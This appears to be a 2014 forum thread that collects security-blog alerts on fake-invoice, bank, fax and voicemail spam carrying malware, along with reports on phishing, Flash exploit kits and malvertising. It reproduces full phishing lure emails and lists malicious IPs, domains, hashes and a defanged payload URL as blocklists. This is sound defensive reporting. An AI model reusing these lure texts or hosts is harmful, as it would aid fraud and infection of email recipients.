Fake Invoice SPAM – word doc malware
- http://myonlinesecurity.co.uk/adobe-invoice-word-doc-malware/
20 Oct 2014 - "An email pretending to come from Adobe with the subject of 'Adobe Invoice' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has an attachment that looks like a proper word.doc but something has disinfected all copies on its travels. All copies that I have received have been -less- than 1kb in size and are empty files with a name only adb-102288-invoice.doc . They are almost certainly supposed to be the typical malformed word docs, that contain a macros script -virus- we have been seeing so much recently that will infect you if you open or even preview them when you have an out of date or vulnerable version of Microsoft word on your computer... The email looks like:
Adobe(R) logo
Dear Customer,
Thank you for signing up for Adobe Creative Cloud
Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service...

Never just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most (if not all) malicious files that are attached to emails will have a faked extension..."

- http://blog.dynamoo.com/2014/10/adobe-billing-adobe-invoice-spam-adb.html
20 Oct 2014
Screenshot: https://1.bp.blogspot.com/-mt-vGbR2Q-U/VEUFltRbPGI/AAAAAAAAF3E/b3_TOFcDpHk/s1600/adobe.png
> https://www.virustotal.com/en-gb/file/bc79dea26a2ec94646dcbad540d3921198c46701359539925e530839aa68fb13/analysis/1413809174/
... Behavioural information
TCP connections
62.75.182.94: https://www.virustotal.com/en-gb/ip-address/62.75.182.94/information/
208.89.214.177: https://www.virustotal.com/en-gb/ip-address/208.89.214.177/information/
___

Dropbox phish - hosted on Dropbox
- http://www.symantec.com/connect/blogs/dropbox-users-targeted-phishing-scam-hosted-dropbox
Updated: 18 Oct 2014 - "... In this scam, messages included links to a -fake- Google Docs login page hosted on Google itself. We continue to see millions of phishing messages every day, and recently we saw a similar scam targeting Dropbox users. The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a -fake- Dropbox login page, hosted on Dropbox itself.
Fake Dropbox login page:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%201.png
The -fake- login page is hosted on Dropbox's user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing. The page looks like the real Dropbox login page, but with one crucial difference. The scammers are interested in phishing for more than just Dropbox credentials; they have also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well. After clicking "Sign in," the user’s credentials are sent to a PHP script on a compromised Web server. Credentials are also submitted over SSL, which is critical for the attack's effectiveness. Without this, victims would see an unnerving security warning.
Security warning:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Dropbox%202.jpg
Upon saving or emailing the user's credentials to the scammer, the PHP script simply -redirects- the user to the real Dropbox login page. Although the page itself is served over SSL, and credentials are sent using the protocol, some resources on the page (such as images or style sheets) are not served over SSL. Using non-SSL resources on a page served over SSL shows warnings in recent versions of some browsers. The prominence of the warning varies from browser to browser; some browsers simply change the padlock symbol shown in the address bar, whereas others include a small banner at the top of the page. Users may not notice or understand these security warnings or the associated implications. Symantec reported this phishing page to Dropbox and they immediately took the page down..."

:fear::fear: :mad:

AplusWebMaster
2014-10-21, 15:06
FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/humber-merchants-group-industrial-invoices-word-doc-malware/
21 Oct 2014 - "An email pretending to come from 'Humber Merchants Group' ps [random number]@humbermerchants .co.uk with a word document attachment and the subject of 'Industrial Invoices' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Attached are accounting documents from Humber Merchants
Humber Merchants Group
Head Office:
Parkinson Avenue
Scunthorpe
North Lincolnshire
DN15 7JX
Tel: 01724 860331
Fax: 01724 281326 ...

21 October 2014: 15040BII3646501.doc - Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2471f4a0febbfede40f5d700553eb28d97519ac49454bcc79f0fb7383559198b/analysis/1413890645/
___

Fake Adobe Invoice Spam
- http://threattrack.tumblr.com/post/100594804508/adobe-invoice-spam
Oct 21, 2014 - "Subjects Seen:
Adobe Invoice
Typical e-mail details:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a62cae97486096c615aa19538d2b5ebb/tumblr_inline_ndt0qkAetU1r6pupn.png

Malicious File Name and MD5:
invoice.zip (CABA79FCEB5C9FEF222C89C423AA2485)
invoice.exe (29684FBB98C1883A7A08977CB23E90B6)

Tagged: Adobe, Wauchos
___

Fake Invoice SPAM - malware
- http://myonlinesecurity.co.uk/please-find-attached-pi-copies-invoice-malware/
21 Oct 2014 - "An email pretending to come from cato-chem .com < sales@ cato-chem .com > with a fake invoice has a subject of Please find attached PI copies of Invoice is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/cato-chem_fake-invoice.png

21 October 2014: proforma invoice.zip: Extracts to proforma invoice.exe
Current Virus total detections: 17/54*. This Please find attached PI copies of Invoice is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a barcode as the icon instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/331d8fbfd2eecd6141a0bc61d3091c1d7e0311a0d8b6c0a29e500052f99c1ac2/analysis/1413858604/
___

ThetaRay turns to maths to detect cyber threats
- http://www.reuters.com/article/2014/10/21/us-thetaray-cybersecurity-idUSKCN0IA1JV20141021
Oct 21, 2014 - "As businesses face a growing threat of cyber attacks, Israeli start-up ThetaRay is betting on maths to provide early detection, enabling the shutdown of systems before damage can be done. The year-old company's first investor was venture capital firm Jerusalem Venture Partners. It is now also backed by heavyweights like General Electric, which uses ThetaRay to protect critical infrastructure such as power plants, and Israel's biggest bank, Hapoalim, which deployed the technology to detect bank account anomalies... Cyber security providers are moving away from protecting gateways with defenses such as firewalls to focus on detecting and preventing attacks before they penetrate organizations... Security experts estimate it can take more than -200- days to identify a cyber attack once it's been launched... Once a threat has been detected, ThetaRay leaves it up to humans to decide whether or not to shut down the system..."

:mad: :fear:

AplusWebMaster
2014-10-22, 16:14
FYI...

Fake Debt Recovery SPAM - PDF malware
- http://myonlinesecurity.co.uk/bd-digital-supplies-commercial-debt-recovery-fake-pdf-malware/
22 Oct 2014 - "An email coming from random senders pretending to be B&D Digital Supplies or B&D Computers which is all about debt recovery and threatening legal action with a subject of 'Commercial Debt Recovery' , Ref No: [ random numbers]is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/commercial-debt-recovery.png

Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
___

Fake customer service SPAM - doc malware
- http://myonlinesecurity.co.uk/customer-service-word-doc-malware/
22 Oct 2014 - "an email pretending to have a word document invoice attachment with a subject of Reference: [random characters] coming from [random name] 'customer service' at an unspecified company is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:

This email contains an invoice file attachment ID:VZY563200VA
Thanks!
Kelli Horn .

22 October 2014: ENC094126XJ.doc - Current Virus total detections: 0/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email program..."
* https://www.virustotal.com/en/file/d328ceac71beead36034d6f74671a84c197cf2fa9e2155885aa720363045eb0e/analysis/1413973355/
___

Fake Malformed or infected word docs with embedded macro viruses
- http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/
22 Oct 2014 - "We are seeing loads of emails with Malformed or infected word docs with embedded macro viruses they are what appears to be a genuine word doc attached which is malformed and contains a macro or vba script virus. Modern versions of Microsoft office, that is Office 2010 and 2013 and Office 365 have Macros disabled by default, UNLESS you or your company have enabled them. Opening this malicious word document will infect you if Macros are enabled and simply previewing it in windows explorer or your email client might well be enough to infect you... Do -not- open word docs received in an email without scanning them with your antivirus first and be aware that there are a lot of dodgy word docs spreading that WILL infect you with no action from you if you are still using an outdated or vulnerable version of word. This is a good reason to update your office programs to a recent version and stop using office 2003 and 2007. The risks in using older version are starting to outweigh the convenience, benefits and cost of keeping an old version going... All modern versions of word and other office programs, that is 2010, 2013 and 365, should open word docs, excel files and PowerPoint etc that are downloaded from the web or received in an email automatically in “protected view” that stops any embedded malware or macros from being displayed and running. Make sure protected view is set in all office programs to protect you and your company from these sorts of attacks..."

- http://blog.dynamoo.com/2014/10/this-email-contains-invoice-file.html
22 Oct 2014
Screenshot: https://3.bp.blogspot.com/-1zwDnotABo4/VEeoiHJ74iI/AAAAAAAAF3Y/mKs9rkfW_oY/s1600/image1.gif
VT1: https://www.virustotal.com/en-gb/file/992fefe6c60d93693be7790a03880cc39a6cc7eb197c8e28bafd53c5ebbfe638/analysis/1413981604/
... Behavioural information
DNS requests
VBOXSVR.ovh.net: 213.186.33.6: https://www.virustotal.com/en-gb/ip-address/213.186.33.6/information/
TCP connections
178.250.243.114: https://www.virustotal.com/en-gb/ip-address/178.250.243.114/information/
91.240.238.51: https://www.virustotal.com/en-gb/ip-address/91.240.238.51/information/
VT2: https://www.virustotal.com/en-gb/file/73602b79321bc8190aed0aa9dd8ea0ef8997a37e92a64932ec258cb1b74f0788/analysis/1413982865/
___

Fake Wells Fargo SPAM – PDF malware
- http://myonlinesecurity.co.uk/wells-fargo-new-secure-message-fake-pdf-malware/
22 Oct 2014 - "An email pretending to come from Wells Fargo with a subject of 'You have a new Secure Message' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a secure message
Read your secure message by download AccountDocuments-10345.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
In order to view the secure message please download it using our Cloud Hosting...

22 October 2014: document_013982_pdf.zip: Extracts to: document_013982_pdf.exe
Current Virus total detections: 5/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/de18e69c371dbd2f684e2dbcb40fa768c5ed8739182e75f4be90d81907e9e247/analysis/1413986180/
... Behavioural information
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
82.98.161.71: https://www.virustotal.com/en-gb/ip-address/82.98.161.71/information/
188.165.237.144: https://www.virustotal.com/en-gb/ip-address/188.165.237.144/information/
80.157.151.17: https://www.virustotal.com/en-gb/ip-address/80.157.151.17/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en-gb/ip-address/173.194.71.127/information/
___

Flash Player exploit in-the-wild - CVE-2014-0569
- https://blog.malwarebytes.org/exploits-2/2014/10/cyber-criminals-quickly-adopt-critical-flash-player-vulnerability/
Oct 22, 2014 - "... less than a week ago, a critical flaw in the Flash Player (CVE-2014-0569*) was patched and made public:
* https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
The vulnerability had been privately reported to Adobe through the Zero Day Initiative group giving the firm the time to fix the issue before it became known to the world. Typically security researchers and criminals will be very attentive to such news and skilled reverse engineers will start looking at the patch to be able to reconstruct the exploit. All things considered, there is normally a certain amount of time before a proof of concept is released and then a little more time before that poc is weaponized by the bad guys... Kafeinee**... stumbled upon that same CVE in a real world exploit kit (Fiesta EK) only one -week- after the official security bulletin had been published... That means we have less and less time to deploy and test security patches. Perhaps this is not too much of a deal for individuals, but it can be more difficult for businesses which need to roll out patches on dozens of machines, hoping doing so will not cause malfunctions in existing applications. In any case, this was our first chance to test CVE-2014-0569 in the wild by triggering the Fiesta EK against Malwarebytes Anti-Exploit:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/FiestaCVE-2014-0569.png
It is crucial to patch any system running outdated Flash Player versions as soon as possible! You can check the version you are running (make sure to do this in all the browsers you use) by going here:
>> http://www.adobe.com/software/flash/about/
The bad guys are not going to run short of vulnerabilities they can weaponize at a quicker rate than ever before. This leaves end-users with very little room for mistakes such as failing to diligently apply security patches -sooner- rather than later..."
** http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html

> https://blog.malwarebytes.org/tag/fiesta-ek/

:mad: :fear:

AplusWebMaster
2014-10-23, 15:46
FYI...

Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This fake Order Confirmation spam pretends to come from supertouch.com / Allied International Trading Limited but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...

In the sample I received, the attachment was -corrupt- but should have been a file a malicious Word document S-CON-A248-194387.doc. The document and payload is exactly the same as the one being sent out today with this spam run[1] (read that post for more details) and is very poorly detected, although blocking access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "

1] http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html

62.75.182.94: https://www.virustotal.com/en/ip-address/62.75.182.94/information/
___

Fake 'bank detail' SPAM - trojan
- http://blog.mxlab.eu/2014/10/23/fake-email-regarding-bitstamp-new-banking-details-contains-trojan/
Oct 23, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “New bank details”. This email is sent from the spoofed address “”Bitstamp .net” <no_reply@ bitstamp .net>”, while the real SMTP sender is AmericanExpress@ welcome .aexp .com, and has the following body:
New banking details
Dear Bitstamp clients,
We would like to inform you that Bitstamp now has new bank details, please check attached file.
We would like to assure those of you who sent deposits to our old details that our old IBAN is still active and your transfers, if otherwise sent with correct information, should arrive without a problem.
Please note that SEPA transfers usually take 1 to 3 business days to arrive and would kindly ask those waiting for your SEPA transfers longer than usually to please send us a transfer confirmation so that we can examine our bank account log and locate your transfers.
Also for those waiting on deposits we ask for your patience; we have accumulated a long list of transfers which lack information or contain wrong information which means we need to manually go through all of them instead of our system sorting them automatically.
Best regards
CEO, Nejc Kodrič
Bitstamp LIMITED

The attached ZIP file has the name bank details.zip and contains the 24 kB large file bank details.scr. The trojan is known as Troj.W32.Gen, a variant of Win32/Kryptik.COEK, HEUR/QVM20.1.Malware.Gen or Mal/Generic-S. At the time of writing, 4 of the 53 AV engines did detect the trojan at Virus Total*. Now, MX Lab has also intercepted some emails -without- the malicious attachment but be aware that this email is a risk..."
* https://www.virustotal.com/en/file/83fc76ba29762e28fc80c08085003b811a1fa3eae51635f99ff35b4022fd1769/analysis/1414073432/
... Behavioural information
DNS requests
VBOXSVR. ovh .net: 213.186.33.6: https://www.virustotal.com/en/ip-address/213.186.33.6/information/
___

Two exploit kits prey on Flash Player flaw patched only last week
- http://net-security.org/malware_news.php?id=2892
23.10.2014 - "Two exploit kits prey on Flash Player flaw patched only last week... The integer overflow vulnerability in question (CVE-2014-0569*) can allow attackers to execute arbitrary code via unspecified vectors, and is deemed critical (high impact, easily exploitable)... the time period was very short, and technical information about the vulnerability and exploit code hasn't yet been shared online... The exploit kits are used to deliver the usual assortment of malware, and some of the variants have an extremely low detection rate... If you use Adobe Flash Player, and you haven't implemented the latest patches, now would be a good time to rectify that mistake."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0569 - 10.0

- http://atlas.arbor.net/briefs/index#1049793989
Elevated Severity
23 Oct 2014

- http://www.securitytracker.com/id/1031019
CVE Reference: CVE-2014-0558, CVE-2014-0564, CVE-2014-0569
Oct 14 2014
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes Vendor Confirmed: Yes
Solution: The vendor has issued a fix (13.0.0.250 extended support release, 15.0.0.189 for Windows/Mac, 11.2.202.411 for Linux)...
Flash 15.0.0.189 released: https://helpx.adobe.com/security/products/flash-player/apsb14-22.html
Oct 14, 2014

For I/E: http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_active_x.exe

For Firefox (Plugin-based browsers): http://download.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_15_plugin.exe

Flash test site: http://www.adobe.com/software/flash/about/
___

Fake 'Order Confirmation' SPAM
- http://blog.dynamoo.com/2014/10/fake-supertouchcom-allied-international.html
23 Oct 2014 - "This -fake- Order Confirmation spam pretends to come from supertouch .com / Allied International Trading Limited - but doesn't. The email is a -forgery- originating from an organised crime ring, it does not originate from supertouch .com / Allied International Trading Limited nor have their systems been compromised in any way.
From: Elouise Massey [Elouise.Massey@ supertouch .com]
Date: 23 October 2014 10:52
Subject: Order Confirmation
Hello,
Thank you for your order, please check and confirm.
Kind Regards
Elouise
Allied International Trading Limited ...

In the sample I received, the attachment was corrupt but should have been a file a malicious Word document S-CON-A248-194387.doc. The document and payload is exactly the same as the one being sent out today with this spam run* (read that post for more details) and is very poorly detected, although -blocking- access to the following IPs and domains might help mitigate against it:
87.106.84.226
84.40.9.34
jvsfiles .com "
* http://blog.dynamoo.com/2014/10/fake-humber-merchants-group.html
___

Fake VoiceMail SPAM
- http://blog.dynamoo.com/2014/10/voice-mail-voicemailsendervoicemailcom.html
23 Oct 2014 - "Before you open something like this.. think if you really get voice mail notifications through your email. No? Well, -don't- open it.
From: "Voice Mail" [voicemail_sender@ voicemail .com]
Date: Thu, 23 Oct 2014 14:31:22 +0200
Subject: voice message from 598-978-8974 for mailbox 833
You have received a voice mail message from 598-978-8974
Message length is 00:00:33. Message size is 264 KB.
Download your voicemail message from dropbox service below (Google Disk
Drive Inc.) ...

Clicking the link goes to a script that detects if the visitor is running Windows, if so it downloads a file doc_9231-92_pdf.zip from the target system which in turn contains a malicious executable doc_9231-92_pdf.exe which has a VirusTotal detection rate of 4/51*... 188.165.214.6 is rather unsurprisingly allocated to OVH France. It also drops a couple of executables onto the system... Recommended blocklist:
188.165.214.6
inaturfag .com "
* https://www.virustotal.com/en-gb/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414075720/
___

Fake BoA SPAM – PDF malware
- http://myonlinesecurity.co.uk/mamie-french-bank-america-unknown-incoming-wire-fake-pdf-malware/
23 Oct 2014 - "'Mamie French Bank of America Unknown incoming wire' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The banking activity with today’s posting date shows Electronic Fund Transfer (EFT) that has been received. Our bank has noted the following information:
EFT Amount: $ 6,200.00
Remitted From: SSA TREAS 310 MISC PAY
Designated for: UNKNOWN
Please download and open attachment with full imformation about this Electronic Fund Transfer payment.
If you confirm that it belongs to your agency or department, please email back or give us a call. Then, our office needs to receive a completed General Deposit no later than 10:00 a.m. tomorrow.
Note: If these funds cannot be identified or if no one claims this EFT, we are required to process the return of this EFT by 10:00 a.m., June 24, 2014.
Thank you.
Mamie French
Senior Accountant
Bank of America ...

23 October 2014: electronic_fund_transfer.zip: Extracts to: electronic_fund_transfer.scr
Current Virus total detections: 10/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0d1c65304481df41fb55c9962e057a1029bd8a28f5a1b75835e1025c25887c0/analysis/1414081814/

:fear: :mad:

AplusWebMaster
2014-10-24, 14:34
FYI...

Fake Invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/invoice-8014042-october-word-doc-malware/
24 Oct 2014 - "'invoice 8014042 October' pretending to come from Sandra Lynch with a malformed word doc attachment containing a macro virus is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 8014042 Account No 5608014042.
Thanks very much
Kind Regards
Sandra Lynch

24 October 2014: invoice_8014042.doc : Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/9659be0ec03fafcea7200032cdf3434ba14c99b9a8e0c3a16f5419d3817c48de/analysis/1414141144/
___

Fake Fax SPAM.. again.
- http://blog.dynamoo.com/2014/10/youve-received-new-fax-spam-again.html
24 Oct 2014 - "Another day, another -fake- fax spam.
From: Fax [fax@ victimdomain .com]
To: luke.sanson@ victimdomain .com
Date: 24 October 2014 10:54
Subject: You've received a new fax
New fax at SCAN2383840 from EPSON by https://victimdomain.com
Scan date: Fri, 24 Oct 2014 15:24:22 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(eFax Drive is a file hosting service operated by J2, Inc.)

The link in the email goes to a script which (if the the browser settings are correct) downloads a file document_92714-872_pdf.zip which in turn contains a malicious executable document_92714-872_pdf.exe which has a VirusTotal detection rate of 3/54*... The malware also drops two executables on the system, kcotk.exe (VT 0/53**...) and ptoma.exe (VT 2/51***...)... Recommended blocklist:
188.165.214.6
rodgersmith .com "
* https://www.virustotal.com/en/file/d9f637e2750f01b7d07451b4262a5d560ef2b5743db0a26881c4ebbd9e04373f/analysis/1414145184/

** https://www.virustotal.com/en-gb/file/8483369c80851bb2ecbf221b9d4c01dbd2980b7d3eb3c5829eccad62bef80651/analysis/1414145764/

*** https://www.virustotal.com/en-gb/file/b4798bbf747180a96b476af6adf167bd62e5c8b5d92b0c994e8a42a45c3bd19e/analysis/1414145784/
___

Widespread malvertising - delivered ransomware
- http://net-security.org/malware_news.php?id=2894
24.10.2014 - "A newer version of the Cryptowall ransomware has been delivered to unsuspecting Internet users via malicious ads shown on a considerable number of high-profile websites, including properties in the Yahoo, Match.com, and AOL domains. According to Proofpoint's calculations*, the malvertising campaign started in late September, picked up the pace this month, and lasted until October 18 and likely even a bit longer... In this campaign, the attackers used already existing ads for legitimate products, and submitted it to at least three major ad network members (Rubicon Project, Right Media/Yahoo Advertising, and OpenX). Visitors to the sites that ended up serving the malicious ads were automatically infected with the ransomware if they used software with vulnerabilities exploitable by the FlashPack Exploit Kit. The ransomware then encrypted the victims' hard drive and asks for money in return for the decryption key. Unfortunately, even if the ransom is paid, there is no guarantee that the victim will actually receive the key. The ransom is supposed to be paid in Bitcoin, and the addresses the criminals used for this purpose are C&C server-generated and many... This particular campaign now seems to be over - all the affected parties (optimizers and ad networks) have been notified, and the malicious ads pulled. Still, that doesn't mean that the attackers have not switched to spreading CryptoWall 2.0 via other means..."
* http://www.proofpoint.com/threatinsight/posts/malware-in-ad-networks-infects-visitors-and-jeopardizes-brands.php
___

Ebola-themed emails deliver malware, exploit Sandworm vulnerability (MS14-060)
- http://net-security.org/malware_news.php?id=2895
24.10.2014 - "US CERT has recently issued a warning* about malware-delivery campaigns using users' fear of the Ebola virus and its spreading as a bait. One of the most prolific campaigns is the one that -impersonates- the World Health Organization:
> http://www.net-security.org/images/articles/who-spam-24102014.jpg
The emails in question initially -linked- to the -malware- a variant of the DarkKomet RAT tool, used by attackers to access and control the victim's computer remotely and steal information. After a while, the attackers began to attach the malware directly to the message, as access to the malicious file hosted on a popular cloud data storage service was blocked quickly by service administrators, noted Tatyana Shcherbakova:
> https://securelist.com/blog/spam-test/67344/a-false-choice-the-ebola-virus-or-malware/
According to Websense researchers**, Ebola-themed malicious emails and documents are also being used by attackers taking advantage of the recently discovered Sandworm vulnerability (CVE-2014-4114***)..."
* https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014
** http://community.websense.com/blogs/securitylabs/archive/2014/10/23/Ebola-Spreads-_2D00_-In-Cyber-Attacks-Too.aspx
*** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114 - 9.3 (HIGH)
___

Phalling for the phish...
- http://blog.dynamoo.com/2014/10/do-people-really-fall-for-this.html
24 Oct 2014 - "... a simple phishing spam..
From: info@ kythea .gr
Date: 24 October 2014 13:50
Subject: payment
this mail is to inform you that the payment have been made
see the attached file for the payment slip
ANTON ARMAS

Attached is a file payment Slip (2).html which displays a popup alert:
You have been signed out of this account this may have happened automatically cause the attachement needs authentication. to continue using this account, you will need to sign in again. this is done to protect your account and to ensure the privacy of your information

The victim then gets sent to a phishing page, in this case at uere.bplaced .net/blasted/tozaiboeki.webmail .html which looks like this..
> https://4.bp.blogspot.com/-dliSNtwDjPk/VEpWNYc6hyI/AAAAAAAAF48/S74-pPcyPuI/s1600/multiphish.jpg
... do people really fall for this? The frightening answer is.. probably, yes."

bplaced .net: 5.9.107.19: https://www.virustotal.com/en/ip-address/5.9.107.19/information/

:mad: :fear:

AplusWebMaster
2014-10-25, 14:24
FYI...

Fake 'New order' SPAM - malware
- http://myonlinesecurity.co.uk/daniela-lederer-re-new-order-malware/
25 Oct2014 - "'Daniela Lederer Re: New Order' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Daniela-Lederer-new-order.png

25 October 2014: J2134457863.zip: Extracts to: J2134457863.exe
Current Virus total detections: 14/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/e5b881143bd10304d8211fc4f2708839361cab6af59934d327150bcb0d098e86/analysis/1414216443/

:fear: :mad:

AplusWebMaster
2014-10-27, 13:45
FYI...

Fake KLM e-Ticket SPAM – PDF malware
- http://myonlinesecurity.co.uk/klm-e-ticket-fake-pdf-malware/
27 Oct 2014 - "'KLM e-Ticket' pretending to come from e-service @klm .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/klm_air_ticket.png

27 October 2014: e-Ticket_klm_Itinerary _pdf.zip: Extracts to: e-Ticket_klm_Itinerary _pdf.exe
Current Virus total detections: 2/53* . This 'KLM e-Ticket' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d0a28086129c3e01e37868532f79cd72acb21d88443fb0a377b3b8a3c184ad88/analysis/1414404573/
___

Fake 'invoice xxxxxx October' SPAM - malicious Word doc
- http://blog.dynamoo.com/2014/10/randomly-generated-invoice-xxxxxx.html
27 Oct 2014 - "There have been a lot of these today:
From: Sandra Lynch
Date: 27 October 2014 12:29
Subject: invoice 0544422 October
Please find attached your October invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 0544422 Account No 5600544422.
Thanks very much
Kind Regards
Sandra Lynch

The numbers in the email are randomly generated, as is the filename of the attachment (in this example it was invoice_0544422.doc). The document itself is malicious and has a VirusTotal detection rate of 5/53*. Inside the Word document is a macro that attempts to download an execute a malicious binary from http ://centrumvooryoga .nl/docs/bin.exe which is currently 404ing which is a good sign. There's a fair chance that the spammers will use this format again, so always be cautious of unsolicited email attachments."
* https://www.virustotal.com/en/file/7dcc2db732fc3c3c8bfbee2539644c8fbc19648d6b82c2fd35bc3a513cd059e6/analysis/1414436717/

83.96.174.219: https://www.virustotal.com/en/ip-address/83.96.174.219/information/
___

Phish... linked with “Dyre” Banking Malware
- https://www.us-cert.gov/ncas/alerts/TA14-300A
Oct 27, 2014 - "Systems Affected: Microsoft Windows. Overview:
Since mid-October 2014, a phishing campaign has targeted a wide variety of recipients while employing the Dyre/Dyreza banking malware. Elements of this phishing campaign vary from target to target including senders, attachments, exploits, themes, and payloads... Although this campaign uses various tactics, the actor’s intent is to entice recipients into opening attachments and downloading malware... The Dyre banking malware specifically targets sensitive user account credentials. The malware has the ability to capture user login information and send the captured data to malicious actors... Phishing emails used in this campaign often contain a weaponized PDF attachment which attempts to exploit vulnerabilities found in -unpatched- versions of Adobe Reader... After successful exploitation, a user's system will download Dyre banking malware..."
___

FTC gets courts to shut down tech support scammers
- http://www.theinquirer.net/inquirer/news/2377916/us-ftc-gets-courts-to-shut-down-tech-support-scammers
Oct 27 2014 - "... the company, which called itself PairSys, would call people at home and claim to be from Microsoft or Facebook. This is a common scam, and the caller will often claim that the victim has a PC-based problem. In some cases people fall for this. It is estimated that PairSys made $2.5m from the scam and that it employed online adverts as well as phone calls as lures. "The defendants behind Pairsys targeted seniors and other vulnerable populations, preying on their lack of computer knowledge to sell ‘security' software and programs that had no value at all," said Jessica Rich, director of the FTC's Bureau of Consumer Protection... The defendants in the case, Pairsys, Uttam Saha and Tiya Bhattacharya, have agreed to the terms of a preliminary injunction, which includes an instruction to shut down their websites and telephone lines and not to sell on their customer data lists."
